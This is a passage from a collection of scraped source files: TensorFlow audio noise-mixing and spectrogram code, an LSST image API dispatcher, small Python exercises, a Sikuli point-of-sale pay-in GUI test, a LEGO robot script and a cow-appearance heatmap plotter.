tensorflow.contrib.framework.python.ops import audio_ops as contrib_audio\nfrom tensorflow.python.ops import io_ops\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.python.util import compat\n\nMAX_NUM_WAVS_PER_CLASS = 2**27 - 1 # ~134M\nNOISE_DIR_NAME = 'noise'\nSPEECH_DIR_NAME = 'clean_speech'\nRANDOM_SEED = 59185\n\n\ndef get_spectrum(wav, win_len=320, win_shift=160, nDFT=320, win_fun=np.hanning):\n \"\"\"Get the spectrogram for given signal. lib 'python_speech_features' is required.\n :param wav: 1-D signal\n :param win_len: length of the signal, in samples\n :param win_shift: non-overlap portion, in samples\n :param win_fun: window function for framing, default is np.hanning\n :param mode: spectrogram for 'magnitude' or 'phase'\n :return: a matrix of size NFRAME*(NFFT/2+1), each row is the spectrum of the corresponding frame\n \"\"\"\n\n wav_np = np.array(wav).flatten()\n wav_np = np.reshape(wav_np, [len(wav_np)])\n # flatten the vector\n #wav = tf.reshape(wav, [-1])\n\n # convert int32 to int\n win_len = int(win_len)\n win_shift = int(win_shift)\n nDFT = int(nDFT)\n\n wav_frame = python_speech_features.sigproc.framesig(sig=wav_np,\n frame_len=win_len,\n frame_step=win_shift,\n winfunc=win_fun\n )\n wav_fft = np.empty([wav_frame.shape[0], int(win_len / 2 + 1)], dtype=complex)\n for frame in range(wav_frame.shape[0]):\n wav_fft[frame] = np.fft.rfft(a=wav_frame[frame], n=nDFT)\n mag_spectrum = np.abs(wav_fft)\n phase_spectrum = np.arctan2(wav_fft.imag, wav_fft.real)\n\n return mag_spectrum, phase_spectrum, wav_fft.real, wav_fft.imag\n\n\ndef which_set(filename, validation_percentage, testing_percentage):\n \"\"\"Determines which data partition the file should belong to.\n\n We want to keep files in the same training, validation, or testing sets even\n if new ones are added over time. This makes it less likely that testing\n samples will accidentally be reused in training when long runs are restarted\n for example. To keep this stability, a hash of the filename is taken and used\n to determine which set it should belong to. This determination only depends on\n the name and the set proportions, so it won't change as other files are added.\n\n It's also useful to associate particular files as related (for example words\n spoken by the same person), so anything after '_nohash_' in a filename is\n ignored for set determination. This ensures that 'bobby_nohash_0.wav' and\n 'bobby_nohash_1.wav' are always in the same set, for example.\n\n Args:\n filename: File path of the data sample.\n validation_percentage: How much of the data set to use for validation.\n testing_percentage: How much of the data set to use for testing.\n\n Returns:\n String, one of 'training', 'validation', or 'testing'.\n \"\"\"\n base_name = os.path.basename(filename)\n # We want to ignore anything after '_nohash_' in the file name when\n # deciding which set to put a wav in, so the data set creator has a way of\n # grouping wavs that are close variations of each other.\n hash_name = re.sub(r'_nohash_.*$', '', base_name)\n # This looks a bit magical, but we need to decide whether this file should\n # go into the training, testing, or validation sets, and we want to keep\n # existing files in the same set even if more files are subsequently\n # added.\n # To do that, we need a stable way of deciding based on just the file name\n # itself, so we do a hash of that and then use that to generate a\n # probability value that we use to assign it.\n hash_name_hashed = hashlib.sha1(compat.as_bytes(hash_name)).hexdigest()\n percentage_hash = ((int(hash_name_hashed, 16) %\n (MAX_NUM_WAVS_PER_CLASS + 1)) *\n (100.0 / MAX_NUM_WAVS_PER_CLASS))\n if percentage_hash < validation_percentage:\n result = 'validation'\n elif percentage_hash < (testing_percentage + validation_percentage):\n result = 'testing'\n else:\n result = 'training'\n return result\n\n\ndef load_wav_file(filename):\n \"\"\"Loads an audio file and returns a float PCM-encoded array of samples.\n\n Args:\n filename: Path to the .wav file to load.\n\n Returns:\n Numpy array holding the sample data as floats between -1.0 and 1.0.\n \"\"\"\n with tf.Session(graph=tf.Graph()) as sess:\n wav_filename_placeholder = tf.placeholder(tf.string, [])\n wav_loader = io_ops.read_file(wav_filename_placeholder)\n wav_decoder = contrib_audio.decode_wav(wav_loader, desired_channels=1)\n return sess.run(\n wav_decoder,\n feed_dict={wav_filename_placeholder: filename}).audio.flatten()\n\n\ndef save_wav_file(filename, wav_data, sample_rate):\n \"\"\"Saves audio sample data to a .wav audio file.\n\n Args:\n filename: Path to save the file to.\n wav_data: 2D array of float PCM-encoded audio data.\n sample_rate: Samples per second to encode in the file.\n \"\"\"\n with tf.Session(graph=tf.Graph()) as sess:\n wav_filename_placeholder = tf.placeholder(tf.string, [])\n sample_rate_placeholder = tf.placeholder(tf.int32, [])\n wav_data_placeholder = tf.placeholder(tf.float32, [None, 1])\n wav_encoder = contrib_audio.encode_wav(wav_data_placeholder,\n sample_rate_placeholder)\n wav_saver = io_ops.write_file(wav_filename_placeholder, wav_encoder)\n sess.run(\n wav_saver,\n feed_dict={\n wav_filename_placeholder: filename,\n sample_rate_placeholder: sample_rate,\n wav_data_placeholder: np.reshape(wav_data, (-1, 1))\n })\n\n\nclass AudioProcessor(object):\n \"\"\"Handles loading, partitioning, and preparing audio training data.\"\"\"\n\n def __init__(self, data_dir, validation_percentage,\n testing_percentage, model_settings):\n self.data_dir = data_dir\n self.noise_type = model_settings['noise_type']\n self.prepare_data_index(validation_percentage, testing_percentage)\n self.prepare_noise_data()\n self.prepare_processing_graph(model_settings)\n\n def prepare_data_index(self, validation_percentage, testing_percentage):\n \"\"\"Prepares a list of the samples organized by set and label.\n\n The training loop needs a list of all the available data, organized by\n which partition it should belong to, and with its file name as labels.\n This function analyzes the wave files below the `data_dir\\\\SPEECH_DIR_NAME`,\n and uses a stable hash to assign it to a data set partition(validation,\n testing, training).\n\n Args:\n validation_percentage: How much of the data set to use for validation.\n testing_percentage: How much of the data set to use for testing.\n\n Returns:\n Dictionary containing a list of file information for each set partition,\n and a lookup map for each class to determine its numeric index.\n\n Raises:\n Exception: If the folder containing speech files doesn't exist.\n Exception: If no .wav files are found in the folder speficified.\n Exception: If any set for training, testing or validation is empty.\n \"\"\"\n # Make sure the shuffling and picking of unknowns is deterministic.\n random.seed(RANDOM_SEED)\n self.data_index = {'validation': [], 'testing': [], 'training': []}\n speech_dir = os.path.join(self.data_dir, SPEECH_DIR_NAME)\n\n if not os.path.exists(speech_dir):\n raise Exception(\"The folder containing speech doesn't exists\")\n search_path = os.path.join(self.data_dir, SPEECH_DIR_NAME, '*.wav')\n\n for wav_path in gfile.Glob(search_path):\n # _, word = os.path.split(os.path.dirname(wav_path))\n # word = word.lower()\n basename = os.path.basename(wav_path)\n filename = os.path.splitext(basename)[0]\n set_index = which_set(wav_path, validation_percentage, testing_percentage)\n self.data_index[set_index].append({'file': wav_path, 'filename': filename})\n\n # Make sure all sets aren't empty and the ordering is random.\n for set_index in ['validation', 'testing', 'training']:\n if not self.data_index[set_index]:\n raise Exception('Set ' + set_index + \" is empty\")\n random.shuffle(self.data_index[set_index])\n\n def prepare_noise_data(self):\n \"\"\"Searches a folder for noise audio, and loads it into memory.\n\n It's expected that the background audio samples will be in a subdirectory\n named 'noise' inside the 'data_dir' folder, as .wavs that match\n the sample rate of the training data, but can be much longer in duration.\n\n If the 'noise' folder doesn't exist, or the noise couldn't be found in the\n folder, the function will throw an error.\n\n NOTE: the sampling rate of noise audio should be the same as speech audio.\n noise and speech audio should be noralmized to [-1, 1]\n\n Returns:\n List of raw PCM-encoded audio samples of background noise.\n\n Raises:\n Exception: If the folder doesn't exist.\n Exception: If noise files aren't found in the folder.\n \"\"\"\n self.noise_data = []\n noise_dir = os.path.join(self.data_dir, NOISE_DIR_NAME)\n if not os.path.exists(noise_dir):\n raise Exception(\"The folder containing noise files doesn't exist\")\n noise_names = self.noise_type\n if not noise_names:\n raise Exception(\"Must specificify at least one type of noise\")\n with tf.Session(graph=tf.Graph()) as sess:\n wav_filename_placeholder = tf.placeholder(tf.string, [])\n wav_loader = io_ops.read_file(wav_filename_placeholder)\n\n # decoding result will be padded with zero if the original length is shorter than the desired length\n wav_decoder = contrib_audio.decode_wav(wav_loader, desired_channels=1)\n for noise_name in noise_names:\n search_path = os.path.join(self.data_dir, NOISE_DIR_NAME, (noise_name\n + \".wav\"))\n if not os.path.isfile(search_path):\n raise Exception('No wav file found for ' + noise_name)\n wav_data = sess.run(\n wav_decoder,\n feed_dict = {wav_filename_placeholder:search_path}).audio.flatten()\n # form a with np.shape (1,n) instead of (n,) so it could be appended to the list\n #wav_data = np.reshape(wav_data, [1, len(wav_data)])\n self.noise_data.append([wav_data])\n\n def prepare_processing_graph(self, model_settings):\n \"\"\"Builds a TensorFlow graph to apply the input distortions.\n\n Creates a graph that loads a .wav file, decodes it, add the noise by given SNR,\n calculates spectrograms as input feature and output labels that feed to neural\n nets. If noise is shorter than speech, the noise will be repeated.\n\n This must be called with an active TensorFlow session running, and it\n creates multiple placeholder inputs, and one output:\n\n - wav_filename_placeholder_: Filename of the WAV to load.\n - foreground_volume_placeholder_: How loud the main clip should be.\n - time_shift_padding_placeholder_: Where to pad the clip.\n - time_shift_offset_placeholder_: How much to move the clip in time.\n - noise_data_placeholder_: PCM sample data for background noise.\n - background_volume_placeholder_: Loudness of mixed-in background.\n - mfcc_: Output 2D fingerprint of processed audio.\n\n Args:\n model_settings: Information about the current model being trained.\n \"\"\"\n desired_samples = model_settings['desired_samples']\n self.wav_filename_placeholder_ = tf.placeholder(tf.string, [], 'wav_filename_placeholder_')\n wav_loader = io_ops.read_file(self.wav_filename_placeholder_)\n wav_decoder = contrib_audio.decode_wav(\n wav_loader, desired_channels=1, desired_samples=desired_samples)\n\n audio = tf.reshape(wav_decoder.audio, [-1])\n #audio = tf.zeros(shape=[90000])\n speech_square = tf.square(audio)\n speech_energy = tf.reduce_sum(speech_square)\n\n # Mix in background noise.\n self.noise_data_placeholder_ = tf.placeholder(dtype=tf.float32, name='noise_data_ph_')\n\n # for test only\n #self.noise_data_placeholder_ = tf.zeros(shape=[40000])\n self.snr = tf.placeholder(dtype=tf.float32, name='snr')\n\n # extend the noise if it is shorter than speech\n def cond(i, extend_times, extend_noise):\n return tf.greater(extend_times, i)\n\n def body(i, extend_times, extend_noise):\n return i+1, extend_times, extend_noise.write(i, self.noise_data_placeholder_)\n\n extend_times = tf.to_int32(tf.ceil(tf.size(audio)\n /tf.size(self.noise_data_placeholder_)))\n extend_noise = tf.TensorArray(tf.float32, tf.to_int32(extend_times))\n\n #i = tf.Variable(initial_value=0, dtype=tf.int32)\n #tmp_test = tf.identity(self.noise_data_placeholder_)\n #temp_test = self.noise_data_placeholder_\n\n i, extend_times, extend_noise = tf.while_loop(cond=cond, body=body,\n loop_vars=[0, extend_times, extend_noise])\n\n extend_noise = tf.reshape(extend_noise.stack(), [-1])\n\n # randomly choose a part of the noise\n start_noise_point = tf.random_uniform(shape=[1,1], maxval=(tf.size(extend_noise)\n - tf.size(audio)), dtype=tf.int32)\n\n # start_noise_point + tf.size(audio)]\n start_noise_point = tf.reshape(start_noise_point, [-1])\n noise_rand = tf.slice(input_=extend_noise, begin=start_noise_point,\n size=[tf.size(audio)])\n\n noise_square = tf.square(noise_rand)\n noise_energy = tf.reduce_sum(noise_square)\n\n energy_ratio = tf.sqrt(speech_energy/(noise_energy*(10**(self.snr/10))))\n\n mix_ = tf.multiply(noise_rand, energy_ratio)\n mix_ = tf.add(mix_, audio)\n\n # normalize to [-1, 1]\n mix_max = tf.reduce_max(mix_)\n mix_ = tf.divide(mix_, mix_max)\n\n # get the spectrogram for clean speech and noisy speech\n '''\n self.spectrogram_mix = get_spectrum(tf_wav=mix_, win_len=model_settings['win_len'], \n win_shift=model_settings['win_shift'], nDFT=model_settings['nDFT'])\n self.spectrogram_speech = get_spectrum(tf_wav=audio, win_len=model_settings['win_len'],\n win_shift=model_settings['win_shift'], nDFT = model_settings['nDFT'])\n '''\n tensor_win_len = tf.Variable(initial_value=model_settings['win_len'])\n tensor_win_shift = tf.Variable(initial_value=model_settings['win_shift'])\n tensor_nDFT = tf.Variable(initial_value=model_settings['nDFT'])\n #tensor_mode = tf.Variable(initial_value='phase', dtype=tf.string)\n\n # magnitude spectrograms\n self.spectrogram_mix, self.phase_spectrogram_mix, self.mix_fft_real, self.mix_fft_imag = tf.py_func(\n func=get_spectrum, inp=[mix_, tensor_win_len, tensor_win_shift, tensor_nDFT],\n Tout=[tf.float64, tf.float64, tf.float64, tf.float64])\n\n self.spectrogram_speech, self.phase_spectrogram_speech, self.speech_fft_real, self.speech_fft_imag = tf.py_func(\n func=get_spectrum, inp=[audio, tensor_win_len, tensor_win_shift, tensor_nDFT],\n Tout=[tf.float64, tf.float64, tf.float64, tf.float64])\n\n\n # phase spectrograms for reconstruction\n '''\n self.phase_spectrogram_mix = tf.py_func(func=get_spectrum, inp=[mix_, tensor_win_len,\n tensor_win_shift, tensor_nDFT, 'phase'], Tout=tf.float64)\n self.phase_spectrogram_speech = tf.py_func(func=get_spectrum, inp=[audio, tensor_win_len,\n tensor_win_shift, tensor_nDFT, 'phase'], Tout=tf.float64)\n '''\n #self.spectrogram_mix = tf.py_func(func=get_spectrum, inp=[mix_], Tout=tf.float64)\n #self.spectrogram_speech = tf.py_func(func=get_spectrum, inp=[audio], Tout=tf.float64)\n def set_size(self, mode):\n \"\"\"Calculates the number of samples in the dataset partition.\n\n Args:\n mode: Which partition, must be 'training', 'validation', or 'testing'.\n\n Returns:\n Number of samples in the partition.\n \"\"\"\n return len(self.data_index[mode])\n\n def get_data(self, how_many, offset, snr, noise_data, model_settings, mode, sess):\n \"\"\"Gather samples from the data set, applying transformations as needed.\n\n When the mode is 'training', a random selection of samples will be returned,\n otherwise the first N clips in the partition will be used. This ensures that\n validation always uses the same samples, reducing noise in the metrics.\n\n Args:\n how_many: Desired number of samples to return. -1 means the entire\n contents of this partition.\n offset: Where to start when fetching deterministically.\n model_settings: Information about the current model being trained.\n mode: Which partition to use, must be 'training', 'validation', or\n 'testing'.\n sess: TensorFlow session that was active when processor was created.\n\n Returns:\n List of sample data for the transformed samples, and list of label indexes\n \"\"\"\n # Pick one of the partitions to choose samples from.\n candidates = self.data_index[mode]\n if how_many == -1:\n sample_count = len(candidates)\n else:\n sample_count = max(0, min(how_many, len(candidates) - offset))\n # Data and labels will be populated and returned.\n num_row = sample_count * len(snr) * len(noise_data)\n\n data_fft_real = np.zeros((num_row, model_settings['spectrogram_size']))\n data_fft_imag = np.zeros((num_row, model_settings['spectrogram_size']))\n label_fft_real = np.zeros((num_row, model_settings['spectrogram_size']))\n label_fft_imag = np.zeros((num_row, model_settings['spectrogram_size']))\n\n pick_deterministically = (mode != 'training')\n # Use the processing graph we created earlier to repeatedly to generate the\n # final output sample data we'll use in training.\n for i in xrange(offset, offset + sample_count):\n # Pick which audio sample to use.\n if how_many == -1 or pick_deterministically:\n sample_index = i\n else:\n sample_index = np.random.randint(len(candidates))\n sample = candidates[sample_index]\n\n input_dict = {\n self.wav_filename_placeholder_: sample['file'],\n }\n\n # generate samples for every single snr and noise type\n for idx_snr, snr in enumerate(snr):\n # in case that integer snr is input\n snr = np.float32(snr)\n for idx_noise, noise in enumerate(noise_data):\n noise_reshape = noise[0].reshape([len(noise[0]), 1])\n #print(noise_reshape.shape)\n input_dict[self.noise_data_placeholder_] = noise_reshape\n input_dict[self.snr] = snr\n # run the graph to get the features and labels\n spectrogram_speech, phase_speech, speech_fft_real, speech_fft_imag = sess.run(\n [self.spectrogram_speech, self.phase_spectrogram_speech, self.speech_fft_real, self.speech_fft_imag],\n feed_dict=input_dict)\n spectrogram_mix, phase_mix, mix_fft_real, mix_fft_imag = sess.run(\n [self.spectrogram_mix, self.phase_spectrogram_mix, self.mix_fft_real, self.mix_fft_imag],\n feed_dict=input_dict)\n idx = i - offset + sample_count * (idx_snr * len(self.noise_data) + idx_noise)\n\n data_fft_real[idx, :] = mix_fft_real.flatten()\n data_fft_imag[idx, :] = mix_fft_imag.flatten()\n label_fft_real[idx, :] = speech_fft_real.flatten()\n label_fft_imag[idx, :] = speech_fft_imag.flatten()\n\n if mode != 'testing':\n return data_fft_real, label_fft_real, data_fft_imag, label_fft_imag\n else:\n return data_fft_real, label_fft_real, data_fft_imag, label_fft_imag, sample['filename']\n","sub_path":"input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":21375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"197214947","text":"#\n# LSST Data Management System\n# Copyright 2017 LSST/AURA.\n#\n# This product includes software developed by the\n# LSST Project (http://www.lsst.org/).\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the LSST License Statement and\n# the GNU General Public License along with this program. If not,\n# see .\n\n\"\"\"\nThis module implements the API dispatch logic.\n\n@author: Kenny Lo, SLAC\n\n\"\"\"\n\nimport os\nimport json\n\nfrom .image_v1 import Image\nfrom .hashutil import Hasher\n\n\nclass Dispatcher(object):\n \"\"\" Dispatcher maps request to corresponding Image method.\n \"\"\"\n\n def __init__(self, config_dir):\n \"\"\"Load and keep ref to the key to API Map.\"\"\"\n config = os.path.join(config_dir, \"api_map.json\")\n with open(config) as jason_api:\n self.api_map = json.load(jason_api)\n jason_api.close()\n\n def find_api(self, req_params):\n \"\"\" Find the API based on its ID.\n\n Parameters\n ----------\n req_params: dict\n the paramters with values.\n\n Returns\n -------\n api: function\n the matching API method of the Image class.\n \"\"\"\n self._map_url_params(req_params)\n ids = sorted(req_params.keys())\n api_id = Hasher.hash(str(ids).encode(\"utf-8\")).hexdigest()\n entry = self.api_map[api_id]\n if entry:\n mod_func = entry[\"api\"]\n # example for api_str: 'Image.cutout'\n mod_name, func_name = mod_func.split(\".\")\n api = getattr(Image, func_name)\n return api\n\n def _map_url_params(self, req_params):\n # map ra,dec into cente.x,center.y\n ra = req_params.pop(\"ra\", None)\n if ra:\n req_params[\"center.x\"] = ra\n dec = req_params.pop(\"dec\", None)\n if dec:\n req_params[\"center.y\"] = dec\n if ra or dec:\n req_params[\"center.unit\"] = \"deg\"\n filt = None\n if \"run\" in req_params or \"tract\" in req_params:\n # check for data id before renaming filter\n pass\n else:\n filt = req_params.pop(\"filter\", None)\n if filt:\n req_params[\"filter\"] = filt\n sid = req_params.pop(\"sid\", None)\n if sid:\n req_params[\"science_id\"] = sid\n width = req_params.pop(\"width\", None)\n if width:\n req_params[\"size.x\"] = width\n height = req_params.pop(\"height\", None)\n if height:\n req_params[\"size.y\"] = height\n unit = req_params.pop(\"unit\", None)\n if unit:\n req_params[\"size.unit\"] = unit\n patch = req_params.pop(\"patch\", None)\n if patch:\n patch_x, patch_y = patch.split(\",\")\n req_params[\"patch_x\"] = patch_x\n req_params[\"patch_y\"] = patch_y\n\n","sub_path":"python/lsst/dax/imgserv/dispatch_v1.py","file_name":"dispatch_v1.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"393694721","text":"\"\"\" This is small HelloWorld-like program \n to display a kind of christmas tree in\n the command line. \n\"\"\"\nheight = 8\nmaxspan = (height-1)*2-1\nlastNumberOfStars = 0\nline = \"\"\n\n# build the tree from top to down\nfor x in range(height):\n \n if lastNumberOfStars == 0:\n currentNumberOfStars = 1\n else:\n currentNumberOfStars = lastNumberOfStars + 2\n\n # check if this is the last line\n # print the trunk of the tree\n if x == height-1:\n currentNumberOfStars = 3\n\n numberOfSpaces = maxspan - currentNumberOfStars\n numberOfSpacesPerSide = int(numberOfSpaces / 2)\n for x in range(numberOfSpacesPerSide):\n line = line + \" \"\n for x in range(currentNumberOfStars):\n line = line + \"*\"\n for x in range(numberOfSpacesPerSide):\n line = line + \" \"\n lastNumberOfStars = currentNumberOfStars\n\n print(line)\n line = \"\"","sub_path":"01_christmastree/christmastree.py","file_name":"christmastree.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"213961160","text":"def print_lists(listing, params=()):\n # Prints all lists.\n print('\\nYour lists:')\n for i in listing.keys():\n print(' ---> ', i)\n\n return listing\n\n\ndef print_items(listing, params=()):\n # Prints all items in chosen list.\n if not params:\n # Yeah, I know. It is called KOSTYL\n selected = (select_list(listing),) if select_list(listing) else None\n else:\n selected = check_params_list(listing, params, 1)\n\n if selected:\n for key, value in listing[selected[0]].items():\n print(' ---> {0} : {1}'.format(key, value))\n\n return listing\n\n\ndef select_list(listing):\n # Returns selected list.\n while listing:\n print_lists(listing)\n selected_list = input('\\nChoose list --> ')\n if selected_list in listing:\n return selected_list\n\n\ndef select_item(listing, sel_li):\n # Returns selected item in list.\n if sel_li in listing:\n while listing[sel_li]:\n print_items(listing, (sel_li,))\n selected_item = input('\\nChoose item --> ')\n if selected_item in listing[sel_li]:\n return (sel_li, selected_item)\n\n\ndef create_list(listing):\n # Creates list\n while True:\n new_list = input('\\nCreate list name. --> ')\n if new_list not in listing:\n return new_list\n print('This name already exists.')\n\n\ndef create_item(listing, selected_list_and_item):\n # Creates items to list\n while selected_list_and_item:\n new_item = input('\\nCreate item name. --> ')\n if new_item not in listing[selected_list_and_item[0]]:\n return (selected_list_and_item[0], selected_list_and_item[1],\n new_item)\n print('This name already exists.')\n\n\ndef check_params_list(listing, params, args):\n # Checks if list is in listing and there is enough arguments\n if (params[0] in listing) and (len(params) >= args):\n return params\n\n\ndef check_params_item(listing, params, args):\n # Checks if item is in list and there is enough arguments\n if (params[0] in listing) and (len(params) >= args):\n if params[1] in listing[params[0]]:\n return params\n","sub_path":"listfuncs.py","file_name":"listfuncs.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"565242497","text":"from sikuli import *\nimport general_functions\nimport general_buttons\nimport test_cases\nimport test_settings\nimport time\nimport gui_screens\n\nglobal l_general_test_settings\nl_general_test_settings = test_settings.general_test_settings( )\nglobal brand\nbrand = l_general_test_settings[6]\nglobal locale\nlocale = l_general_test_settings[8]\nglobal l_base_dir\nl_base_dir = l_general_test_settings[10]\nglobal is_gui_test\nis_gui_test = l_general_test_settings[11]\nglobal country\ncountry = l_general_test_settings[13]\nglobal l_test_settings\nl_test_settings = test_settings.pay_in( )\n\n\ndef pay_in():\n general_functions.errorhandling(\"ABORT\")\n general_functions.start_of_test_case('pay in')\n general_functions.extended_wait(\"main_page_key_pad\", 300)\n\n # TEST CASE\n if is_gui_test == 'YES':\n gui_screens.check_gui_element('main_page')\n\n for z in range(0, l_test_settings[0]):\n\n general_buttons.main_page_footer_menu_btns_click('OTHER')\n\n # TEST CASE\n if is_gui_test == 'YES':\n gui_screens.check_gui_element('other_screen')\n\n general_buttons.main_page_other_menu_btns_click('PAY-IN')\n\n # four eyes authorization\n general_functions.four_eyes(l_general_test_settings[4], l_general_test_settings[5])\n\n # select pay_out reason\n\n print('list item: ' + 'LIST ITEM ' + str(z + 1))\n general_buttons.click_in_list('LIST ITEM ' + str(z + 1))\n\n # TEST CASE\n if is_gui_test == 'YES':\n gui_screens.check_gui_element('pay_in_reasons')\n\n # confirm reason\n type(Key.ENTER)\n\n # TEST CASE\n if is_gui_test == 'YES':\n gui_screens.check_gui_element('pay_in_total_amount_screen')\n\n # amount that's payed out\n type(str(z + 1) + '.00')\n\n # confirm amount\n type(Key.ENTER)\n\n wait(3)\n\n receipt_meta_data_array = general_functions.get_receipt_meta_data( )\n\n # click CASH button\n general_buttons.pay_out_key_pad_click('CASH')\n\n # confirm pay out\n type(Key.ENTER)\n\n general_functions.close_drawer_msg( )\n\n general_functions.start_of_test_case('pay in ' + 'LIST ITEM ' + str(z + 1))\n\n z = + 1\n\n general_functions.start_of_test_case('cancel pay in')\n\n general_buttons.main_page_footer_menu_btns_click('OTHER')\n\n # TEST CASE\n if is_gui_test == 'YES':\n gui_screens.check_gui_element('other_screen')\n\n general_buttons.main_page_other_menu_btns_click('PAY-IN')\n\n # four eyes authorization\n general_functions.four_eyes(l_general_test_settings[4], l_general_test_settings[5])\n\n # select and confirm pay out reason\n # general_functions.general_message('select pay out reason')\n type(Key.ENTER)\n\n # TEST CASE\n if is_gui_test == 'YES':\n gui_screens.check_gui_element('pay_in_reasons')\n\n # type amount that's payed out\n # general_functions.general_message('type amount that's payed out')\n type(\"9.99\")\n\n # TEST CASE\n if is_gui_test == 'YES':\n gui_screens.check_gui_element('pay_in_total_amount_screen')\n\n # confirm amount\n # general_functions.general_message('confirm amount')\n type(Key.ENTER)\n\n wait(3)\n\n # get receipt data and save it\n receipt_meta_data_array = general_functions.get_receipt_meta_data( )\n\n # click CANCEL TRANSACTION button\n # general_functions.general_message('CANCEL')\n general_buttons.basket_page_key_pad_btns_click('CANCEL')\n\n # four eyes authorization\n general_functions.four_eyes(l_general_test_settings[4], l_general_test_settings[5])\n\n type(Key.ENTER)\n type(Key.ENTER)\n\n # general_functions.general_message('end of payout')\n\n general_functions.end_of_test_case( )","sub_path":"pay_in.sikuli/pay_in.py","file_name":"pay_in.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"365002697","text":"import rosebot\nimport time\ndef go_and_get_some_water(speed):\n robot=rosebot.RoseBot()\n robot.arm_and_claw.calibrate_arm()\n robot.sound_system.speech_maker.speak(\"Are you thirsty now\").wait()\n while True:\n if robot.sensor_system.touch_sensor.is_pressed():\n robot.drive_system.spin_clockwise_until_sees_object(speed,1200)\n robot.drive_system.go_forward_until_distance_is_less_than(0.4,speed)\n break\n robot.arm_and_claw.move_arm_to_position(3000)\n\ndef stop_and_ask():\n robot=rosebot.RoseBot()\n robot.sound_system.speech_maker.speak(\"Oh you don't want water\").wait()\n while True:\n if robot.sensor_system.touch_sensor.is_pressed():\n break\n robot.drive_system.stop()\n robot.arm_and_claw.lower_arm()\n robot.sound_system.speech_maker.speak(\"Call me if you are thirsty\").wait()\n\ndef go_back_and_give_me_the_water(speed):\n robot=rosebot.RoseBot()\n robot.sound_system.speech_maker.speak(\"Now I get the water\").wait()\n while True:\n robot.drive_system.right(speed,speed)\n if robot.sensor_system.color_sensor.get_reflected_light_intensity()<=20:\n robot.drive_system.stop()\n break\n robot.arm_and_claw.lower_arm()\n robot.sound_system.speech_maker.speak(\"Now you can enjoy your water\").wait()\n\n\n\n\n\n\n\n","sub_path":"src/m2_extra.py","file_name":"m2_extra.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"271543990","text":"class Solution:\n def maxSubarray(self, nums):\n\n size = len(nums)\n \n for i in range(1, size):\n if nums[i-1] > 0:\n nums[i] += nums[i-1]\n \n return max(nums)\n \n\nif __name__=='__main__':\n arg1 = [-2, 1, -3, 4, -1, 2, 1, -5, 4]\n res = Solution().maxSubarray(arg1)\n print(res)\n\n","sub_path":"E_maximum_subarray/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"571853094","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom datetime import datetime, timedelta\nimport random\nfrom matplotlib.colors import ListedColormap\nfrom plot_cowNumber import getEidDict\nimport csv\nfrom videoLibs import decomposeFrameNamePts\n\nstartDate = datetime(2020,4,9)\nendDate = datetime(2020,8,21)\n\nblack='#000000'\ngreen='#6acc64'\nred='#e74c3c'\n\nmycolors=[black # NO_FRAMR=0\n ,green # NUMBER_OF_FRAMES=1\n ,red # NUMBER_OF_FRAMES>1\n ]\n\ndef dateRange(date1, date2):\n dateList = []\n for n in range(int ((date2 - date1).days)+1):\n dateList.append(date1 + timedelta(n))\n # aaa = [datetime.strptime(day) for day in dateList]\n return dateList \n\ndef getEidAppearedDays(eidListFile):\n eidDict = {}\n with open(eidListFile) as csvfile:\n csvReader = csv.reader(csvfile)\n for row in csvReader:\n eidFolderPath = row[0] \n eid = os.path.basename(eidFolderPath)\n _,_,files = next(os.walk(eidFolderPath))\n days = [decomposeFrameNamePts(frame)['day'] for frame in files]\n eidDict[eid] = days\n return eidDict\n\ndef covertToSameLength(dictIn, dates):\n numOfDays = len(dates)\n dictOut = {}\n for eid, appearedDays in dictIn.items():\n dictOut[eid] = zerolistmaker(numOfDays)\n for day in appearedDays:\n index = dates.index(day)\n dictOut[eid][index] = dictOut[eid][index] + 1\n return dictOut\n\ndef zerolistmaker(n):\n listofzeros = [0] * n\n return listofzeros\n\ndef plot_heatmap(df, eidListFile):\n figHeight = len(df)*0.3\n cmap = ListedColormap(mycolors)\n sns.set(rc={'figure.figsize':(20,figHeight)})\n ax = sns.heatmap(df,cmap=cmap, linewidths=0.01, linecolor='#5d5d5d',cbar=False)\n title = os.path.basename(eidListFile).split('.')[0]\n ax.set(title = title)\n plt.savefig('heatmap_1369_'+ title.split('_')[-1] + '.png')\n\ndef eidListToDf(eidListFile):\n dates = [day.strftime(\"%Y%m%d\") for day in dateRange(startDate,endDate)]\n eidAppearedDays = getEidAppearedDays(eidListFile)\n eidAppearedDays_sameLength = covertToSameLength(eidAppearedDays, dates) \n df = pd.DataFrame(eidAppearedDays_sameLength,index = dates).transpose()\n df[df>2] = 2\n return df\n\ndef getFileList(filePath):\n aList = []\n with open(filePath) as csvFile:\n csvReader = csv.reader(csvFile)\n for row in csvReader:\n aList.append(row[0])\n return aList\n\ndef main():\n # For a single file:\n eidListFile = '/data/gpueval/imageProcessing/peguo0/cowFace/outputImages/cowList_1369_sorted.txt'\n df = eidListToDf(eidListFile)\n plot_heatmap(df, eidListFile)\n\n # # For a batch:\n # eidFilesPath = 